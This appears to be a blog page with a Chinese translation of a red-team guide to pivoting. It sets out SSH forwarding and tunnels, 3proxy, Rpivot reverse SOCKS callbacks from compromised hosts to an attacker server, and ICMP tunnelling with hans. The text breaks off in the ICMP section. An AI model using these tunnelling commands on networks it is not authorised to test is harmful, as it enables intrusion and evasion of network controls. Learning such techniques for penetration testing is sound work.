<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"howiezhao.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":true,"version":"8.18.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文翻译自 https:&#x2F;&#x2F;artkond.com&#x2F;2017&#x2F;03&#x2F;23&#x2F;pivoting-guide&#x2F; ，正文如下：  渗透测试人员经常通过逻辑网络边界来访问客户的关键基础设施。常见的情况包括在成功的外围攻破之后，将攻击发展到内部网络，或者在危及组织内的主机之后访问初始的不可路由的网段。跳板是 red team&#x2F;pentest 参与过程中使用的一系列技术，它们利用攻击者控制的主机作为逻">
<meta property="og:type" content="article">
<meta property="og:title" content="一个红队成员的跳板（pivoting）指南">
<meta property="og:url" content="https://howiezhao.github.io/2017/12/10/pivoting-guide/index.html">
<meta property="og:site_name" content="Howie&#39;s Notes">
<meta property="og:description" content="本文翻译自 https:&#x2F;&#x2F;artkond.com&#x2F;2017&#x2F;03&#x2F;23&#x2F;pivoting-guide&#x2F; ，正文如下：  渗透测试人员经常通过逻辑网络边界来访问客户的关键基础设施。常见的情况包括在成功的外围攻破之后，将攻击发展到内部网络，或者在危及组织内的主机之后访问初始的不可路由的网段。跳板是 red team&#x2F;pentest 参与过程中使用的一系列技术，它们利用攻击者控制的主机作为逻">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://howiezhao.github.io/images/pivoting1.png">
<meta property="article:published_time" content="2017-12-10T14:51:35.000Z">
<meta property="article:modified_time" content="2022-07-30T07:17:27.000Z">
<meta property="article:author" content="Howie Zhao">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://howiezhao.github.io/images/pivoting1.png">


<link rel="canonical" href="https://howiezhao.github.io/2017/12/10/pivoting-guide/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://howiezhao.github.io/2017/12/10/pivoting-guide/","path":"2017/12/10/pivoting-guide/","title":"一个红队成员的跳板（pivoting）指南"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>一个红队成员的跳板（pivoting）指南 | Howie's Notes</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-104250838-2"></script>
  <script class="next-config" data-name="google_analytics" type="application/json">{"tracking_id":"UA-104250838-2","only_pageview":false}</script>
  <script src="/js/third-party/analytics/google-analytics.js"></script>








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/atom.xml" title="Howie's Notes" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Howie's Notes</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Machine Learning and Cyber Security</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-sitemap"><a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>Sitemap</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%A5%E5%85%AC%E6%9C%89-IP-%E4%B8%BA%E7%9B%AE%E6%A0%87"><span class="nav-number">1.</span> <span class="nav-text">以公有 IP 为目标</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SSH-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="nav-number">1.1.</span> <span class="nav-text">SSH 端口转发</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%9A%E8%BF%87-SSH-%E7%9A%84-VPN"><span class="nav-number">1.1.1.</span> <span class="nav-text">通过 SSH 的 VPN</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3proxy"><span class="nav-number">1.2.</span> <span class="nav-text">3proxy</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NAT-%E5%9C%BA%E6%99%AF"><span class="nav-number">2.</span> <span class="nav-text">NAT 场景</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SSH-%E5%8F%8D%E5%90%91%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91-w-3proxy"><span class="nav-number">2.1.</span> <span class="nav-text">SSH 反向端口转发&#x2F;w 3proxy</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Rpivot"><span class="nav-number">2.2.</span> <span class="nav-text">Rpivot</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BB%8E%E5%86%85%E9%83%A8%E7%BD%91%E7%BB%9C%E6%B3%84%E6%BC%8F"><span class="nav-number">3.</span> <span class="nav-text">从内部网络泄漏</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ICMP-%E9%9A%A7%E9%81%93"><span class="nav-number">3.1.</span> <span class="nav-text">ICMP 隧道</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DNS-%E9%9A%A7%E9%81%93"><span class="nav-number">3.2.</span> <span class="nav-text">DNS 隧道</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Iodine"><span class="nav-number">3.2.1.</span> <span class="nav-text">Iodine</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Dnscat2"><span class="nav-number">3.2.2.</span> <span class="nav-text">Dnscat2</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%AC%E5%8F%B8%E7%9A%84-HTTP-%E4%BB%A3%E7%90%86%E4%BD%9C%E4%B8%BA%E4%B8%80%E7%A7%8D%E5%87%BA%E8%B7%AF"><span class="nav-number">3.3.</span> <span class="nav-text">公司的 HTTP 代理作为一种出路</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8-Rpivot"><span class="nav-number">3.3.1.</span> <span class="nav-text">使用 Rpivot</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Cntlm"><span class="nav-number">3.3.2.</span> <span class="nav-text">Cntlm</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%80%9A%E8%BF%87-HTTP-%E4%BB%A3%E7%90%86%E7%9A%84-OpenVpn"><span class="nav-number">3.3.3.</span> <span class="nav-text">通过 HTTP 代理的 OpenVpn</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%B8%A6%E6%9C%89-proxychains-%E7%9A%84-SOCKS"><span class="nav-number">4.</span> <span class="nav-text">利用带有 proxychains 的 SOCKS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DNS-%E4%B8%8E-proxychains"><span class="nav-number">5.</span> <span class="nav-text">DNS 与 proxychains</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BE%8E%E5%8C%96%E4%BD%A0%E7%9A%84-web-shell"><span class="nav-number">6.</span> <span class="nav-text">美化你的 web shell</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Python-PTY-shell"><span class="nav-number">6.1.</span> <span class="nav-text">Python PTY shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Socat"><span class="nav-number">6.2.</span> <span class="nav-text">Socat</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%91%E5%AE%9A-shell"><span class="nav-number">6.2.1.</span> <span class="nav-text">绑定 shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%90%91-shell"><span class="nav-number">6.2.2.</span> <span class="nav-text">反向 shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%88%E7%AB%AF%E5%A4%A7%E5%B0%8F"><span class="nav-number">6.2.3.</span> <span class="nav-text">终端大小</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Tsh"><span class="nav-number">6.3.</span> <span class="nav-text">Tsh</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Howie Zhao"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Howie Zhao</p>
  <div class="site-description" itemprop="description">Stay Hungry, Stay Foolish</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">133</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/howiezhao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;howiezhao" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://stackoverflow.com/users/6312748/howiezhao" title="StackOverflow → https:&#x2F;&#x2F;stackoverflow.com&#x2F;users&#x2F;6312748&#x2F;howiezhao" rel="noopener me" target="_blank"><i class="fab fa-stack-overflow fa-fw"></i>StackOverflow</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://zh.wikipedia.org/wiki/User:Howiezhao" title="Wikipedia → https:&#x2F;&#x2F;zh.wikipedia.org&#x2F;wiki&#x2F;User:Howiezhao" rel="noopener me" target="_blank"><i class="fab fa-wikipedia-w fa-fw"></i>Wikipedia</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://space.bilibili.com/23433050" title="bilibili → https:&#x2F;&#x2F;space.bilibili.com&#x2F;23433050" rel="noopener me" target="_blank"><i class="fab fa-bilibili fa-fw"></i>bilibili</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml" rel="noopener me"><i class="fas fa-rss fa-fw"></i>RSS</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          Links
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <a href="https://howiezhao.com/" title="https:&#x2F;&#x2F;howiezhao.com" rel="noopener" target="_blank">Howie's Blog</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://tomorrowli.github.io/" title="https:&#x2F;&#x2F;tomorrowli.github.io" rel="noopener" target="_blank">TomorrowLi's Blog</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://wenc1997.github.io/" title="https:&#x2F;&#x2F;wenc1997.github.io" rel="noopener" target="_blank">Wenc</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://blog.csdn.net/qq_35490191" title="https:&#x2F;&#x2F;blog.csdn.net&#x2F;qq_35490191" rel="noopener" target="_blank">songshaoのblog</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://zeki-zl.github.io/" title="https:&#x2F;&#x2F;zeki-zl.github.io" rel="noopener" target="_blank">Zeki's Blog</a>
            </li>
            <li class="links-of-blogroll-item">
              <a href="https://ximouzhao.com/" title="https:&#x2F;&#x2F;ximouzhao.com&#x2F;" rel="noopener" target="_blank">Zhao Ximou's Blog</a>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://howiezhao.github.io/2017/12/10/pivoting-guide/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Howie Zhao">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Howie's Notes">
      <meta itemprop="description" content="Stay Hungry, Stay Foolish">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="一个红队成员的跳板（pivoting）指南 | Howie's Notes">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          一个红队成员的跳板（pivoting）指南
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2017-12-10 22:51:35" itemprop="dateCreated datePublished" datetime="2017-12-10T22:51:35+08:00">2017-12-10</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2022-07-30 15:17:27" itemprop="dateModified" datetime="2022-07-30T15:17:27+08:00">2022-07-30</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Translation/" itemprop="url" rel="index"><span itemprop="name">Translation</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>本文翻译自 <a target="_blank" rel="noopener" href="https://artkond.com/2017/03/23/pivoting-guide/">https://artkond.com/2017/03/23/pivoting-guide/</a> ，正文如下：</p>
<hr>
<p>渗透测试人员经常通过逻辑网络边界来访问客户的关键基础设施。常见的情况包括在成功的外围攻破之后，将攻击发展到内部网络，或者在危及组织内的主机之后访问初始的不可路由的网段。跳板是 red team&#x2F;pentest 参与过程中使用的一系列技术，它们利用攻击者控制的主机作为逻辑网络进行跳跃，旨在扩大网络可视性。在这篇文章中，我将介绍常用的跳板技术和可用的工具。</p>
<span id="more"></span>

<h2 id="以公有-IP-为目标"><a href="#以公有-IP-为目标" class="headerlink" title="以公有 IP 为目标"></a>以公有 IP 为目标</h2><p>一个普遍的情况。比方说，你可以从互联网上找到一个网络应用程序中的 RCE 漏洞。你上传了一个 shell，并想把你的攻击发展到内部网络。请注意，在这种特定情况下，你应该能够绑定受感染主机上的端口，并且应该可以从外部网络访问这些端口。</p>
<h3 id="SSH-端口转发"><a href="#SSH-端口转发" class="headerlink" title="SSH 端口转发"></a>SSH 端口转发</h3><p>设法找到在主机上运行的 SSH 服务的凭据？很好！连接到主机，如下所示：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh username@host -D 1080</span><br></pre></td></tr></table></figure>

<p>这将在攻击者一侧产生一个 socks 服务器（ssh 客户端）。欢迎来到内部网络;）也可以将一个特定的端口转发给特定的主机。假设你需要访问主机 192.168.1.1 的内部网络中的 SMB 共享。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh username@host -L 445:192.168.1.1:445</span><br></pre></td></tr></table></figure>

<p>这样，端口 445 就会被打开在攻击者一侧。请注意，要绑定特权端口（例如 445），你将需要在你的计算机上拥有 root 权限。</p>
<h4 id="通过-SSH-的-VPN"><a href="#通过-SSH-的-VPN" class="headerlink" title="通过 SSH 的 VPN"></a>通过 SSH 的 VPN</h4><p>由于 openssh 4.3 版本，可以通过已建立的 ssh 通道来传输第 3 层网络流量。这比典型的 tcp 隧道有优势，因为你在控制 ip 流量。因此，例如，你可以使用 nmap 执行 SYN 扫描，并直接使用你的工具，而无需使用 <code>proxychains</code> 或其他代理工具。它是通过在客户端和服务器端创建 tun 设备并通过 ssh 连接在它们之间传输数据完成的。这很简单，但是由于 tun 设备的创建是一个特权操作，所以在两台机器上都需要 root。这些行应该出现在 <code>/etc/ssh/sshd_config</code> 文件（服务器端）中：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PermitRootLogin <span class="built_in">yes</span></span><br><span class="line">PermitTunnel <span class="built_in">yes</span></span><br></pre></td></tr></table></figure>

<p>客户端上的以下命令将在客户端和服务器上创建一对 tun 设备：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh username@server -w any:any</span><br></pre></td></tr></table></figure>

<p>标志 <code>-w</code> 接受用冒号分隔的每一侧的 tun 设备的数量。可以显式设置 —— <code>-w 0:0</code>，也可以使用 <code>-w any:any</code> 语法来获取下一个可用的 tun 设备。<br>tun 设备之间的隧道已启用，但接口尚未配置。配置客户端的示例：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0</span><br></pre></td></tr></table></figure>

<p>服务器端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0</span><br></pre></td></tr></table></figure>

<p>在服务器上启用 IP 转发和 NAT：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/net/ipv4/ip_forward</span><br><span class="line">iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE</span><br></pre></td></tr></table></figure>

<p>现在，你可以将对等主机 <code>1.1.1.1</code> 设置为你的默认网关，或通过它路由到特定的主机&#x2F;网络：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">route add -net 10.0.0.0/16 gw 1.1.1.1</span><br></pre></td></tr></table></figure>

<p>在这个例子中，服务器的外部网络接口是 <code>eth0</code>，两端新创建的 tun 设备是 <code>tun0</code>。</p>
<h3 id="3proxy"><a href="#3proxy" class="headerlink" title="3proxy"></a>3proxy</h3><p>在这里获取 - <a target="_blank" rel="noopener" href="https://github.com/z3APA3A/3proxy/releases">https://github.com/z3APA3A/3proxy/releases</a> 。这个工具适用于多个平台。有预编译的 Windows 二进制文件。至于 Linux，你将需要自己编译它，这是一个很简单的事，只是 <code>./configure &amp;&amp; make</code> :)这个工具是代理世界中的瑞士军刀，所以它有很多的功能。我通常使用它作为 socks 代理或端口转发。<br>这个工具从配置文件中获得所有选项。运行它：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">3proxy.exe config_file</span><br></pre></td></tr></table></figure>

<p>或者如果你在 Linux 系统上：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./3proxy config_file</span><br></pre></td></tr></table></figure>

<p>要在端口 1080 上运行 3proxy 作为 socks5 代理，请在 config 中放置以下行：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socks -p1080</span><br></pre></td></tr></table></figure>

<p>现在可以通过这个代理来隧道化你的渗透测试工具，以发展内部网络的攻击。这只是一个不太安全的基本设置。你可以使用选项来放置身份验证和&#x2F;或基于 IP 的访问控制规则。去检查完整的手册在这里 - <a target="_blank" rel="noopener" href="https://3proxy.ru/howtoe.asp">https://3proxy.ru/howtoe.asp</a> 。要对特定端口进行隧道使用，请用以下语法：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcppm &lt;localport&gt; &lt;targethost&gt; &lt;targetport&gt;</span><br></pre></td></tr></table></figure>

<h2 id="NAT-场景"><a href="#NAT-场景" class="headerlink" title="NAT 场景"></a>NAT 场景</h2><p>这是我在交战中遇到的最常见的情况。到目标的流量正在转发到逐个端口的基础上。这意味着除了端口转发规则以外的所有端口都不能从外部访问。一种可能的解决方案是启动反向连接。下面介绍的工具将帮助你做到这一点。</p>
<h3 id="SSH-反向端口转发-w-3proxy"><a href="#SSH-反向端口转发-w-3proxy" class="headerlink" title="SSH 反向端口转发&#x2F;w 3proxy"></a>SSH 反向端口转发&#x2F;w 3proxy</h3><p>这个跳板设置看起来像这样：<br>在目标服务器上使用以下配置运行 3proxy 服务：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socks -p31337</span><br></pre></td></tr></table></figure>

<p>在接收方（攻击者的机器）上创建一个单独的用户。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adduser sshproxy</span><br></pre></td></tr></table></figure>

<p>这个用户必须是低权限的，不应该有 shell 权限。毕竟，你不想被反向渗透，你呢？:)编辑 &#x2F;etc&#x2F;passwd 并将 shell 切换到 &#x2F;bin&#x2F;false。它应该是这样的：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">...</span><br><span class="line">sshproxy:x:1000:1001:,,,:/home/sshproxy:/bin/false</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>现在使用 <code>-R</code> 标志连接到新创建的用户的服务器。Linux 系统：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh sshproxy@your_server -R 31337:127.0.0.1:31337</span><br></pre></td></tr></table></figure>

<p>对于 Windows，你将需要首先上传 <a target="_blank" rel="noopener" href="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html">plink.exe</a>。这是一个 putty 的控制台版本。运行它：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">plink.exe sshproxy@your_server -R 31337:127.0.0.1:31337</span><br></pre></td></tr></table></figure>

<p><code>-R</code> 标志允许你绑定服务器端的端口。到此端口的所有连接都将被中继到客户端上的指定端口。这样我们就可以在客户端运行 3proxy socks 服务（受感染的机器）并通过 ssh<code>-R</code> 标志访问攻击者主机上的这个端口。</p>
<h3 id="Rpivot"><a href="#Rpivot" class="headerlink" title="Rpivot"></a>Rpivot</h3><p>这是我最喜欢穿越 NAT 连接的方法。<a target="_blank" rel="noopener" href="https://github.com/artkond/rpivot">Rpivot</a> 是一个反向 socks 代理工具，可以让你通过 socks 代理隧道化流量。它连接回你的机器，并绑定一个 socks 代理。它的工作方式与 <code>ssh -D</code> 很像，但方向相反。服务器端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0</span><br></pre></td></tr></table></figure>

<p>客户端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python client.py --server-ip &lt;ip&gt; --server-port 9999</span><br></pre></td></tr></table></figure>

<p>结果，一个 socks4 代理服务将被绑定在服务器端的 1080 端口。</p>
<h2 id="从内部网络泄漏"><a href="#从内部网络泄漏" class="headerlink" title="从内部网络泄漏"></a>从内部网络泄漏</h2><p>这是另一种情况。比方说，你的社会工程学表演最终让你进入了内部网络。你的连接受限，并且能够在受感染的计算机上执行命令。当然，如果互联网直接路由，而不是用做防火墙，你可以凭借任何上述技术。但如果你不那么幸运，还是有办法把你的出路转出来。</p>
<h3 id="ICMP-隧道"><a href="#ICMP-隧道" class="headerlink" title="ICMP 隧道"></a>ICMP 隧道</h3><p>如果 icmp 流量被允许到外部网络，那么很可能你可以建立一个 icmp 隧道。缺点是你需要在目标系统上拥有 root&#x2F;administrator 权限，因为有必要使用原始套接字。检查这个工具 - <a target="_blank" rel="noopener" href="https://code.gerade.org/hans/">https://code.gerade.org/hans/</a> 。我个人从来没有尝试过在 Windows 上运行它。它在 Linux 上非常有效。服务器端命令（攻击者的机器）：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./hans -v -f -s 1.1.1.1 -p P@ssw0rd</span><br></pre></td></tr></table></figure>

<p><code>-v</code> 标志是详细的，<code>-f</code> 标志在前台运行，<code>-s</code> 标志的值是服务器在新创建的 tun 接口上的 ip。<br>客户端：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./hans -f -c &lt;server_ip&gt; -p P@ssw0rd -v</span><br></pre></td></tr></table></figure>

<p>连接成功后，客户端应该可以直接在 1.1.1.100 处看到：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># ping 1.1.1.100</span></span><br><span class="line">PING 1.1.1.100 (1.1.1.100) 56(84) bytes of data.</span><br><span class="line">64 bytes from 1.1.1.100: icmp_seq=1 ttl=65 time=42.9 ms</span><br></pre></td></tr></table></figure>

